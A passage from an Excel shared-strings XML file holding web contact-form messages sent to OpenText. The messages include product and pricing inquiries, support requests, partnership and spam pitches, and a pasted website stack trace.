How looks possibility of cooperation with you as a "reseller"/ partner of your solution in above field (Captiva). _x000D_
_x000D_
Please, let us know your thoughts._x000D_
_x000D_
Best regards,_x000D_
Damian</t>
  </si>
  <si>
    <t>Please share us the quote for Hamming Bird, which we would like to install it on database shared server.</t>
  </si>
  <si>
    <t>Beat maker</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
we have been looking into project management systems for our company. we recently were sent drawings and documents to download from our client via your software. please can we have some more infomation and quotes as we are interested in getting this ourselves._x000D_
_x000D_
many thanks_x000D_
_x000D_
Katie Evans</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir_x000D_
I would like to take this opportunity to introduce ourselves as one of the leading Consulting and outsourcing organization rooted in Noida India and works across the globe._x000D_
At SysDataLytics, We support our customer’s requirements and offer a range of customized solutions with the highest degree of honesty, integrity and services with excellence. We offer solutions that are efficient and definitely effective and appropriate._x000D_
_x000D_
“Our client's success is our success. And a happy customer is our happiness”._x000D_
_x000D_
Why SysDataLytics:-_x000D_
_x000D_
We have a network of committed executive's along with a thorough our unique screening process .We have a strong database of professionals ranging from CEOs to skilled Technical Personnel's covering the entire functional spectrum for organization._x000D_
_x000D_
We would like to work as your partners to provide consulting and outsourcing, resourced from here as well as from overseas. We can help you identify shortlist and close the current open positions that you may have._x000D_
We can help you in providing contractual and permanent staffing services across all the competencies _x000D_
_x000D_
Officially, we are a global, end-to-end human capital solutions organization. And we helps companies to find, hire and manage great talent with fuller efficiency._x000D_
Looking Forward positively._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Shrawan Thakur_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Attention for marketing.  Part of my role is to contact new companies to see if they are interested in attending, exhibiting or sponsoring our annual conference.  We work with companies like yours to help promote your services to our members from the IT industry.  Please do contact me if you are interested.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello i had missed cal from your services from deutchland. What is a reason of your call. </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
bitte informieren Sie mich über die Termine der nächsten "Captiva Capture"-Schulungen.</t>
  </si>
  <si>
    <t>Dear All,_x000D_
_x000D_
I would like to contact one of your representatives who manages the strategic partnerships, to discuss how we could sell or offer our online courses through your platform._x000D_
_x000D_
Just to give you a quick overview about us, Shaw Academy is the world’s largest live online educator. We are currently educating over 300,000 new students each month._x000D_
_x000D_
I would be very keen if we could organize a time for a short call within the dates and time that are most suitable for you to further discuss this opportunity. _x000D_
_x000D_
Looking forward to hearing from you and to start to work together._x000D_
_x000D_
Many thanks for your time in advance and have a great day._x000D_
_x000D_
Regards,_x000D_
Niamh</t>
  </si>
  <si>
    <t>Please contact us to get an urgent renewal quote. Awaiting,</t>
  </si>
  <si>
    <t xml:space="preserve">Please quote me the reseller price for the following items;_x000D_
1.	System Administrators ------ QTY 2_x000D_
2.	Concurrent documents controller ----QTY 10_x000D_
3.	Concurrent end user ---- QTY 20_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi , We have heard from one of our clients, Cargill Ocean Transportation that they are using opentext solutions for filing and archiving emails in outlook through shared folders. And then they are linked to our vessels managing system, Imos. We are curious about this setup and would like to know more about it and the resources required. Hope you can get back to us soon. _x000D_
_x000D_
Thanks!_x000D_
Best regards_x000D_
Kuan yee</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have local partner in Indonesia, Jakarta. _x000D_
Since we would like to purchase below product : _x000D_
1.           Exceed 15J (Language:English) _x000D_
2.           Media Exceed_x000D_
3.           Yearly cost Exceed_x000D_
</t>
  </si>
  <si>
    <t>Hi,  my name is Emily Muir and I work in ITS for the Uniting Church.  I am assisting a client of ours - UCA Funds Management - gather some information RE a customer communications management solution which will connect with their unit registry and generate documents for email._x000D_
I have a rough outline of their requirements which I can send you and we would like a ballpark estimate of what a solution will cost.   _x000D_
Please note I do work part time so if you could please email me at webservices@victas.uca.org.au, my colleague can respond if I am not in the office._x000D_
With many thanks_x000D_
Emily</t>
  </si>
  <si>
    <t xml:space="preserve"> i can get my support_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Interested in the exchange archiving solution. Would like pricing for budget purposes. How is it priced. Per user? Approx (35) users - currently running Exchange 2007 but looking to migrate to 2013 or 2016 if that is an issue?_x000D_
_x000D_
System requirements for the solution etc._x000D_
_x000D_
Best regards_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are planning an e-service portal to manage a consistent user experience front-end, and strong workflow management backend, to be implemented next year. I would like information about your offerings in this area. We are arranging some presentations of best in class products. We will also be sending out a Request for Information shortly. Pleasse contact me.</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
Would you be interested in VMware Users Database? _x000D_
_x000D_
We can provide all the decision makers like CEO's, CFO's, CIO's, CMO's and VP's Etc., with verified email address, phone numbers, Fax and Etc.,_x000D_
_x000D_
Let me know your target audience, so that I can give you more information, Pricing and Counts and few sample for your review._x000D_
_x000D_
Best Regards,_x000D_
Emily Tracy,_x000D_
emily.tracy.us@gmail.com,_x000D_
Marketing Manager._x000D_
http://aidedigitals.com/</t>
  </si>
  <si>
    <t>Looking for a simple OCR solution to integrate with Alfresco ECM so that PDF image documents can be converted into PDF searchable text documents.  Also, a scanning UI would be preferred.  Further down the road, also looking for a fax solution so inbound and outbound faxes can be tied into Alfresco.  Small 25-employee business operation with limited budget but ready to make quick decision ASAP for a current Alfresco implementation project.  Thank you!</t>
  </si>
  <si>
    <t>Please quote the following for Dept. of Justice - Bureau of Prisons:_x000D_
_x000D_
This is an urgent request.  _x000D_
_x000D_
0001 S-MO-TS-CORP, ANNUAL STANDARD CARE SUPPORT FOR_x000D_
TEAMSITE BASE SERVER Maintenance Plan: Standard_x000D_
Performance 10/1/2017 to 9/30/2018_x000D_
1.000000 $____________ $____________________x000D_
0002 S- MO- TS - TECHNICAL USER, ANNUAL STANDARD CARE_x000D_
SUPPORT FOR TECHNICAL USER Maintenance Plan :_x000D_
STANDARD_x000D_
Period of Performance 10/1/2017 to 9/30/2018._x000D_
200.000000 EA $____________ $____________________x000D_
0003 S- MO-TSDEVSTE, ANNUAL STANDARD CARE SUPPORT FOR_x000D_
DEVELOPER LICENSE 1 Maintenance Plan: STANDARD_x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
1.000000 EA $____________ $____________________x000D_
0004 S-MO-TS-TECHNICAL USER, ANNUAL STANDARD CARE_x000D_
SUPPORT FOR TECHNICAL USER Maintenance Plan:_x000D_
STANDARD_x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
10.000000 EA $____________ $____________________x000D_
0005 S-MO- H9A03AAE, ANNUAL STANDARD CARE SUPPORT FOR_x000D_
ADDITIONAL OPEN DEPLOY RECEIVERS Maintenance Plan :_x000D_
STANDARD._x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
3.000000 EA $____________ $____________________x000D_
0006 S- MO-TS-TECHNICAL USER, TeamSite User Maintenance Plan :_x000D_
STANDARD._x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
100.000000 EA $____________ $____________________x000D_
0007 S-MO- H9A03AAE, Open Deploy Receiver Maintenance Plan :_x000D_
STANDARD_x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
2.000000 EA $____________ $____________________x000D_
0008 S-MO-TS- USER, Teamsite Users Maintenance_x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
159.000000 EA $____________ $____________________x000D_
0009 S- MO- H9A03AAE, Open Deploy Receivers Maintenance_x000D_
Period of Performance 10/1/2017 to 9/30/2018_x000D_
1.000000 EA $____________ $____________________x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Eric Fridenstine_x000D_
540-692-4465</t>
  </si>
  <si>
    <t xml:space="preserve">PennWell is a business-to-business events, media, and marketing services company dedicated to anticipating and exceeding our customers’ changing needs.   PennWell has over 100 websites that fit into three main categories: online news and print magazines which have a lot of archived content, professional events which discuss current industry issues, and hubs which has member profiles, personalized news, and discussions on current news &amp; events. There are few areas which are vital to PennWell for taxonomy categorization: _x000D_
    • Accurate automatic tagging and semi-automatic tagging of relevant content to taxonomy topics_x000D_
    • GUI to manage taxonomy topic models for Additions/Deletions/Changes on the fly_x000D_
    • Bulk tagging for archived content for large and small taxonomy changes_x000D_
    • Scoring of enriched taxonomy to help prioritize tagging hierarchies on content. _x000D_
    • Must align 30 plus existing taxonomies which are associated with the following industries: Oil &amp; Gas, Power Generation, Renewable Energy, Fire &amp; Emergency Medical Services, Dental, Optoelectronics &amp; Photonics, LEDs &amp; Lighting, Aviation &amp; Defense, Cabling and Broadband, and Water &amp; Wastewater. </t>
  </si>
  <si>
    <t>Hello, LAM's looking to replace our existing document management system with an enhanced enterprise content management (ECM) based on specific requirements we have. Can you e-mail me a contact that I can work with to determine fit? Thx Shyam Jagannath</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak with someone about automating the processing of invoices that are not EDI.  </t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
We are a veteran owned and disabled small business reseller. We have been asked to provide pricing on an OpenText maintenance renewal. Would you be able to assist us with pricing? Please let us know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Joseph 'Carter' Mackey</t>
  </si>
  <si>
    <t>I would like to get a sales demo of what your WCM solution offers and discuss what we may need from you today in regards to our WCM and what pricing would be.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to purchase “Spicer Imagenation” (“Desktop Viewer-View Markup Edit” )  tool for our engineering service division. _x000D_
_x000D_
Could you please help me on this?_x000D_
</t>
  </si>
  <si>
    <t>Following up to see if Mike Chasteen (VP, Americas B2B Netowrk Sales) and/or Frank Calabrese (VP, Global Sales - Business Networks) wanted to schedule a phone interview for the Sr. Account Executive - Business Networks job that is open with OpenText in Southern California (Irvine).  Please forward to Mike &amp; Frank as I wanted to confirm they received the resume submittal to their email address(es).  Thank you in advance for contacting Mike &amp; Frank.</t>
  </si>
  <si>
    <t>Driven Data trying to makes sales i got some products Ubuntu azure snapcraft i'm industry</t>
  </si>
  <si>
    <t>Obtain list of providers covered by Magellan</t>
  </si>
  <si>
    <t>Hello,_x000D_
We would like to quote a Fax System integrated to a Cisco CUCM, under these requirements:_x000D_
- 500 Users._x000D_
- 170 Concurrent users._x000D_
- 18,250 annual pages (average)._x000D_
-  170 Fax devices._x000D_
- Supported formats: pdf, Word, Excel, PowerPoint, HTML, txt and images._x000D_
- Sending fax message to email inbox capacity (IBM Lotus Note)_x000D_
_x000D_
Thanks for your quick contact.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
After several email, I write to make an inquiries about your webfax service be kind to email or call me to discourse modalities and more information's._x000D_
_x000D_
Your prompt respond will be highly appreciated_x000D_
_x000D_
Greg Brandjord_x000D_
Featherstone Home Accents_x000D_
Phone: 913-755-9037_x000D_
Fax:     913-469-5923_x000D_
6527 W 119th Street_x000D_
Overland Park, KS 66209_x000D_
Email: sales@featherstomehomeaccents.com_x000D_
www.featherstomehomeaccents.com</t>
  </si>
  <si>
    <t>Please advise on how to replace an employee on our Fax-to-Mail service?  Our Toll Number to be Ported is 707-578-4270.  Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">(Note: ce courriel est adressé à un manager des ressources humaines (ou similaire) des entreprises Belges et Françaises. Veuillez transmettre ce courriel à la personne concernée.)_x000D_
Cher(e) Monsieur, Madame,_x000D_
_x000D_
En tant qu’étudiante en Master à la KULeuven (University of Leuven), je mène un projet de recherche sur l’adoption des pratiques des Systèmes de Travail Hautement Performants (en anglais: High Perfomance Work Systems ou HPWS) en France et Belgique. _x000D_
_x000D_
Je vous envoie ce courriel pour demander votre participation à cette recherche. Cette enquête dure environs 5 minutes à compléter et est structurée comme suit:_x000D_
1.	Brève explication sur le sujet_x000D_
2.	Questions générales sur l’entreprise_x000D_
3.	Questions « oui ou non » sur l’adoption des pratiques des Systèmes de Travail Hautement Performants_x000D_
_x000D_
L’enquête est disponible en anglais, néerlandais et français. Vous pouvez y participer en cliquant sur le lien suivant: https://odisee.qualtrics.com/jfe/form/SV_bkjtkjheDF4WFEN_x000D_
_x000D_
Votre contribution est fort appréciée. Si vous avez des questions, n’hésitez pas à me contacter en envoyant un e-mail à l’adresse suivante: ailinh.choichikwong@student.kuleuven.be_x000D_
_x000D_
Je vous prie d’agréer, Monsieur, Madame, mes salutations les plus distinguées. _x000D_
Ai-Linh Choi Chi Kwong_x000D_
</t>
  </si>
  <si>
    <t>I Have a client that works with Dell/EMC and they need to buy SLC from you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Our company, JetSmarter Inc., is interested in using OpenText as a document and information management solution to ensure our information and documents are managed, secure, and easily accessible.  We would also like to use OpenText as an integrated email lifecycle management solution that is intuitive and transparent to the user.  _x000D_
_x000D_
_x000D_
Look forward to you help._x000D_
_x000D_
Lawrence</t>
  </si>
  <si>
    <t>Need to upgrade Rightfax to be compatible with Exchange 2016</t>
  </si>
  <si>
    <t>Ignore</t>
  </si>
  <si>
    <t>test. please ignore</t>
  </si>
  <si>
    <t>Interesse an Archivierung und Dokumentenmanagementlösungen</t>
  </si>
  <si>
    <t>Investigating QMS to replace current manual system. We are already FDA and SOX compliance.</t>
  </si>
  <si>
    <t>Applikationsanfrage</t>
  </si>
  <si>
    <t>Is there a way to obtain a listing of the easy link fax numbers and associates assigned with those accounts?  Also, do you offer online invoice viewing?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">J'ai besoin de recommandation matériel de virtualisation pour installer EMC 7.6 </t>
  </si>
  <si>
    <t>It appears that your products/ application could work well with my client base and would like to learn more. My interest is in public transport and is looking for a scalable BI firm to support my client base and business model._x000D_
Thanks much for your assistance and timely follow-up._x000D_
Best Regards,_x000D_
Michael Blaylock</t>
  </si>
  <si>
    <t>Hello, we need to install EMC Captiva Capture 7.6 in our company in a cloud so we need to know what is the recommandation for this intallation ,thinks</t>
  </si>
  <si>
    <t>Could you tell me the licencing model and public price of Open Text Integration Center?</t>
  </si>
  <si>
    <t>Issues with duplicate workpackets in Global360, we need to know how these have been created in the first place. I have spoken with our account manager Ellen Griffith who has provided the below information for getting a support ticket open..._x000D_
Product Line – Connectivity_x000D_
EU Number – EU0188912_x000D_
Co Worker – NA_x000D_
SUID – V1031-15000_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
I can't access our support tickets on the Opentext support environment. I get the error _x000D_
_x000D_
"OpenText Connect_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process_x000D_
_x000D_
Request Confirmation Email"_x000D_
_x000D_
I received a confirmation mail and pushed the confirm button several times without the desired result._x000D_
_x000D_
Please help me!_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Jos de Vries_x000D_
ING</t>
  </si>
  <si>
    <t>I need a Performance Management System</t>
  </si>
  <si>
    <t>SharePoint Connector till Documentum D2</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have requested TIETO to do this. Please forget my previous mails._x000D_
_x000D_
Best regards,_x000D_
Holger Vool</t>
  </si>
  <si>
    <t>Hi, we have a client we are building a solution for and I am interested in finding out more information about Digital Documents by OpenText for SAP Hybris.</t>
  </si>
  <si>
    <t>looking for jobs work</t>
  </si>
  <si>
    <t>why my Account is cancel _x000D_
i was Registration to my corp before_x000D_
can you take me back?</t>
  </si>
  <si>
    <t>thdfbjfcdfs</t>
  </si>
  <si>
    <t>Request for list of authorized resellers (who can provide technical services as required) for Documentum maintenance agreement renewal.</t>
  </si>
  <si>
    <t>Inquiry regarding invoice scanning solution</t>
  </si>
  <si>
    <t xml:space="preserve">Need to know how to start this fax service </t>
  </si>
  <si>
    <t>I need the rightfax exchange connector install files. We are replacing a few of our existing exch servers with new 2016 hybrid servers.</t>
  </si>
  <si>
    <t>Yes my name is Thomas Smith and I have a IRA with you through my company and I get a ss check and I would like the ss check to go to you to invest for me is this  possible ?  I don’t need the ss check now .I will when I retire. Can you please help with what I need to do.                    Thank you very much.  Thomas</t>
  </si>
  <si>
    <t>Please block fax calls to this phone number. Thanks_x000D_
Everytime I went to www.opentext.com/block, was not found.</t>
  </si>
  <si>
    <t>Access to support to be able to create ticket</t>
  </si>
  <si>
    <t>Our medical device engineering and manufacturing firm ranges from 43-56 employees. Could you provide pricing for an optical character recognition system to scan and store documents?</t>
  </si>
  <si>
    <t>We are interested in a demo of eDocs applications for Law Firms.  Particularly, Document Management, eMail Filing and Records Management._x000D_
Thanks,_x000D_
_x000D_
Kristin</t>
  </si>
  <si>
    <t>We're looking for a way to manage our digital records.  Photos, videos, documents of various forms.  Looks like some of your offerings might be helpful.</t>
  </si>
  <si>
    <t>Can I get access to HP Exstream Knowledbase ? Not sure what happened to my access since changed to OpenText? Please help?? BTW We are now Hilltop Securities Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello good afternoon_x000D_
_x000D_
In my previous job I used to use eRoom and Documentum for engineering projects. Nowadays I am working for Airbus Helicopters Mexico and I need to use eRoom and Documentum in order to my projects  have a positive impact. However here in the company  we are not using the applications, that’s why I would like to  show my manager the advantages of using eRoom and Documentum I was wondering if you have  support here in Mexico or in which way you can send me information about eRoom and Documentum so that I can share it with all my team members._x000D_
_x000D_
Kind Regards _x000D_
</t>
  </si>
  <si>
    <t>Broadcast service required, be kind to call me or email on my direct contact stated below, as i wait your respond._x000D_
_x000D_
Brandjord_x000D_
_x000D_
Phone: 913-755-9037_x000D_
Fax:     913-469-5923_x000D_
Email: sales@featherstomehomeaccents.com_x000D_
www.featherstomehomeaccents.com</t>
  </si>
  <si>
    <t>Could you please email (or fax 612-348-0395) a W9?  Our purchase order mailed to you two weeks ago has come back undeliverable._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I need to be able to view my account activity. Please provide instructions to do so. Our account number is W401060287. _x000D_
_x000D_
Thank you for your time, _x000D_
Raven Hauck_x000D_
Account Manager, BookbyteDIRECT</t>
  </si>
  <si>
    <t>Please have your business development department or manager contact me regarding an upcoming service engineering support services Request for Information.  Our previous Covisint contact was Brian Drury.</t>
  </si>
  <si>
    <t>I am a product manager at a EHSQ software named Cority. I would like to explore how we could automatically push documents created from our software into LiveLink for a client.</t>
  </si>
  <si>
    <t>We are investigating the possibility of adding document scanning functionality to our ERP system to allow users to automatically scan supplier invoices into our system to speed up the approval process and are looking at OCR tools which can help us to do this</t>
  </si>
  <si>
    <t>Currently using Kofax Capture and interested in OpenText Capture Center.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
The Research Paper for Magellan, the email link with the download failed. Is there another way to obtain the report?</t>
  </si>
  <si>
    <t>I was visiting your website http://www.opentext.com/what-we-do/industries/legal/legal-content-management-edocs and i found this trace:_x000D_
javax.servlet.jsp.JspException: Exception in generateLink tag at com.opentext.www.linktranslation.OTLinkBuilder.doStartTag(OTLinkBuilder.java:250) at org.apache.jsp.opentext.view.redesign.productCategoryProductsLC_jsp._jspx_meth_otwww_005fgenerateLink_005f0(productCategoryProductsLC_jsp.java:636) at org.apache.jsp.opentext.view.redesign.productCategoryProductsLC_jsp._jspx_meth_c_005fforEach_005f0(productCategoryProductsLC_jsp.java:307) at org.apache.jsp.opentext.view.redesign.productCategoryProductsLC_jsp._jspx_meth_c_005fwhen_005f0(productCategoryProductsLC_jsp.java:261) at org.apache.jsp.opentext.view.redesign.productCategoryProductsLC_jsp._jspx_meth_c_005fchoose_005f0(productCategoryProductsLC_jsp.java:229) at org.apache.jsp.opentext.view.redesign.productCategoryProductsLC_jsp._jspService(productCategoryProductsLC_jsp.java:124) at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) at javax.servlet.http.HttpServlet.service(HttpServlet.java:723) at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:388) at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:313) at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:260) at javax.servlet.http.HttpServlet.service(HttpServlet.java:723) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206) at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:646) at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:551) at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:488) at com.vignette.ext.templating.mvc.views.JSPView.render(JSPView.java:70) at com.vignette.ext.templating.mvc.views.AbstractScriptVi</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Ladies and Gentlemen,_x000D_
_x000D_
I am evaluating a solution for Application Retirement and Data Archiving. Please could you send me some information about your product and the licensing model?_x000D_
_x000D_
We want to archive data from different applications, e.g. ERP, time registration, controlling..._x000D_
_x000D_
I am looking forward to hearing from you._x000D_
_x000D_
Best regards_x000D_
_x000D_
Janosch Lenski_x000D_
Corporate IT Systems_x000D_
_x000D_
ALPLA Werke Alwin Lehner GmbH &amp; Co KG_x000D_
Mockenstraße 34, A-6971 Hard_x000D_
_x000D_
T: +43 (5574) 602-665_x000D_
M: +43 (664) 85 92 191_x000D_
janosch.lenski@alpla.com_x000D_
http://www.alpla.com_x000D_
_x000D_
________________________________________________________________x000D_
ALPLA Werke  Alwin Lehner GmbH &amp; Co KG – Allmendstraße 81 – A-6971 Hard_x000D_
Firmenbuchgericht LG Feldkirch, Firmenbuchnummer  FN 13422 p_x000D_
</t>
  </si>
  <si>
    <t>I`m the best person you will like to work with .</t>
  </si>
  <si>
    <t xml:space="preserve">The NCA is changing its 3rd party supply chain arrangements and needs to discuss this with an Opentext account manager. Please contact: change.management@nca.x.gsi.gov.uk_x000D_
urgently_x000D_
</t>
  </si>
  <si>
    <t>Some time ago I bought Brava! Desktop v72. I recently had to format my computer and consequently lost the program. What should I do to recover it?</t>
  </si>
  <si>
    <t>Email id and password</t>
  </si>
  <si>
    <t>We have a Rightfax server and are considering upgrading to the most current version. I would like to speak to someone about the requirements and costs involved.</t>
  </si>
  <si>
    <t>Enrol a participant in Open Text content server system administrator V16 course of 6 November</t>
  </si>
  <si>
    <t>Are there keyboard shortcuts to open the annotating tools in the Brava viewer?</t>
  </si>
  <si>
    <t xml:space="preserve">I’m in the process of compiling our contract renewal and budget information for next year.  Could you please send me details of any renewals, and expected costs (including any price increases)?_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>I am looking discounted price for one of my existing Right Fax solution, please share distributors contacts details who are dealing for the country of Oman.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to know more about 3-0188 OpenText Content Server System Administrator v16 trainning course. Can you provide a pdf for the Munich_Grasbrunn site, like the one for UK Reading? Also, the 2018 dates are already available ?_x000D_
Regards</t>
  </si>
  <si>
    <t>Hello,_x000D_
i want to try your Product "FirstClass". But i dont can find a link to the Server Version. Is there an Version of "FirstClass Server" which i can download._x000D_
_x000D_
Best regards_x000D_
Maik</t>
  </si>
  <si>
    <t>Discuss BIRT Cloud offering or PaaS. Need general licensing costs and trial details.</t>
  </si>
  <si>
    <t>Hi there!_x000D_
_x000D_
I am looking to find out more about Magellan and how it could support our business needs._x000D_
_x000D_
Thank you!_x000D_
_x000D_
Ana</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext-Team,_x000D_
_x000D_
i cant not open tickets right now? I always get the message:_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
Please click on the link below to complete the process_x000D_
Request Confirmation Email_x000D_
_x000D_
I get the email and click on Confirm Registration. But its still not working._x000D_
_x000D_
Thanks &amp; Regards_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I just started at the company inovoo GmbH, partner of OpenText. Unfortunately I can't access the marketing support area (e.g. logos etc). Can you please help me?_x000D_
Best regards_x000D_
Barbara</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Firma Opentext,_x000D_
 _x000D_
am 22.09.2017 sind uns auf Grund Ihrer Überweisung  199,49 EUR gutgeschrieben worden. _x000D_
Wir können den Betrag jedoch nicht buchen, da auf dem Zahlungsbeleg kein ausreichender Verwendungszweck angegeben ist bzw. die Aufstellung (Zahlungs-Avis) nicht vorliegt._x000D_
 _x000D_
Der Überweisungsbeleg Ihrer Zahlung enthielt folgenden Verwendungszweck: _x000D_
 _x000D_
  EREF+DE112000000178         SVWZ+04000000372017001_x000D_
        AUFTRAGGEBER: OPEN TEXT DOCUMENT TECHNOLO GIESGMBH_x000D_
 _x000D_
Bitte teilen Sie uns den Verwendungszweck (Rechnungsnummer oder Buchungskonto aus Ihrer Telekom-Rechnung) umgehend per E-Mail oder per Fax mit._x000D_
 _x000D_
Zukünftige Zahlungsavise können Sie direkt senden an:_x000D_
Fax: +49 391 580105460_x000D_
Mail: kundenbuchhaltung.avise-m@telekom.de_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
Can you please let me know if you have ever provided a product called Brava Enterprise Client (version 7).  It is an application that has been identified by one of our clients, but we are not sure who is the supplier._x000D_
Thanks,_x000D_
Omar</t>
  </si>
  <si>
    <t>Hi,_x000D_
this problem is related to PDF. OCR is not able to extract the PdF sent by OCR while if I am saving same PDF twice in my system then it is working fine. kindly provide the solution also provide the PDF with the name  vim_7.0_sp3_ci-27.pdf ._x000D_
_x000D_
Regards,_x000D_
Priyanka semwal</t>
  </si>
  <si>
    <t xml:space="preserve">I work for Outokumpu and Harshul Arora [mailto:harora@opentext.com] asked me to download:_x000D_
Here are the details for the VIM express transports._x000D_
_x000D_
1.	Please transport the layout variants transport found here https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68347210_x000D_
_x000D_
2.	Once done, please transport the VIM Express transports found in the attached zip file._x000D_
 </t>
  </si>
  <si>
    <t>Hello,_x000D_
Please provide me information about DMS and what sort of services would be provided in terms of implementation at our Jeddah based head office.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in the BPM, DPA  and some other solution provided by Opentext. Kindly contact us to arrange a meet up to discuss further on this matter._x000D_
_x000D_
Thank you._x000D_
_x000D_
Best regards,_x000D_
YongXian _x000D_
</t>
  </si>
  <si>
    <t>request Access of My Support</t>
  </si>
  <si>
    <t>Open Text RightFax Outlook Add-in shows Inactive in Outlook 2010. Please help!</t>
  </si>
  <si>
    <t>Confirm if we have the support for RightFax issues.</t>
  </si>
  <si>
    <t>Pricing inquiry</t>
  </si>
  <si>
    <t>Good afternoon, _x000D_
My name is Cristina and I am the office manager for Two One Two Design._x000D_
_x000D_
Every time I try to send a fax by e-mailing 1+faxnumber@m5fax.com i do not get any kind of notification and I am afraid my fax is not working. _x000D_
_x000D_
We never had a LogIn for this website but we have been using your product for years. _x000D_
_x000D_
I hope you can help me_x000D_
Cristina</t>
  </si>
  <si>
    <t>Добрый день! _x000D_
 _x000D_
Ищем людей, желающих продать оригинальные расходные материалы, а также новую оргтехнику (МФУ, принтеры и т.п.), произведённых компаниями HP, XEROX, Canon. _x000D_
Гарантируем моментальное проведение оплаты и полную анонимность сделки. Закупки производим в любых объёмах. _x000D_
Сотрудничать готовы с любыми регионами России. _x000D_
Оплату можем произвести как в безналичной, так и в наличной формах. _x000D_
 _x000D_
С уважением Маслов Алексей _x000D_
+7(926) 806-8185 _x000D_
http://skypka.net/ _x000D_
 _x000D_
Работаем по всем регионам РФ, принимаем заявки так же через: _x000D_
Telegram +79268068185 _x000D_
WhatsApp +79268068185 _x000D_
icq 728217144 _x000D_
 _x000D_
P/S _x000D_
Пжл. не отвечайте на это сообщение со своего ящика электронной почты, так как оно создано в автоматическом режиме и никуда не дойдёт! _x000D_
Используйте пожалуйста для связи вышеуказанные координаты!</t>
  </si>
  <si>
    <t>Do you require an entertaining chorus of singers to perform for you?_x000D_
_x000D_
Grand Harmony Women’s Chorus is a four-part a cappella harmony chorus.  We sing everything from toe tapping songs to ballads.  We would be delighted to have our chorus perform for you._x000D_
_x000D_
We are a group of 40 plus amazing dedicated women who sing a cappella under the direction of our award winning director, Mr. Chris Arnold from Waterloo. We have performed for Christkindl Market, Christmas Staff Parties, Olympic Torch Celebration, Weddings, Retirement Homes, Freeport Hospital, Final Friday’s (City of Waterloo), Conrad Theatre, and Humanities Theatre &amp; Conrad Grebel College Choir._x000D_
_x000D_
We would like the opportunity to perform for you.  We can arrange a full chorus, smaller group or an octet/quartet.  I can be reached at 519-291-1656 or email me at jane@jstoltz.com for additional information. We rehearse at Parkwood Mennonite Home, 726 New Hampshire St, Waterloo on Tuesday evenings from 7:00 to 9:55 p.m.  You’re most welcome to come hear us rehearse._x000D_
_x000D_
 May we perform for you?_x000D_
_x000D_
Jane Stoltz - Performance Co-ordinator _x000D_
http://www.grandharmonychorus.com</t>
  </si>
  <si>
    <t>Do the reports designed with the OpenText Analytics Designer work on Apache Tomcat using the same report viewer from the Open Source BIRT package?</t>
  </si>
  <si>
    <t xml:space="preserve">Magellan AI and automating research tasks. </t>
  </si>
  <si>
    <t>Hello there. I am trying to run reports in Documentum manually that will pull in specific data I'm needing. Could someone please give me a call now if possible?</t>
  </si>
  <si>
    <t>I have seen repeated interest in Veracode's content and website from Open Text. _x000D_
I was looking for the party that is responsible for application security to help with the current initiative that might be underway.. I'm just trying to get in touch with the right person.</t>
  </si>
  <si>
    <t>Hi, We are looking to buy network license for our company, please give me a call as soon as possible.</t>
  </si>
  <si>
    <t>Hi, We are running Application Extender 7.0 and would like some pricing on additional user licensing and product support.  Thanks</t>
  </si>
  <si>
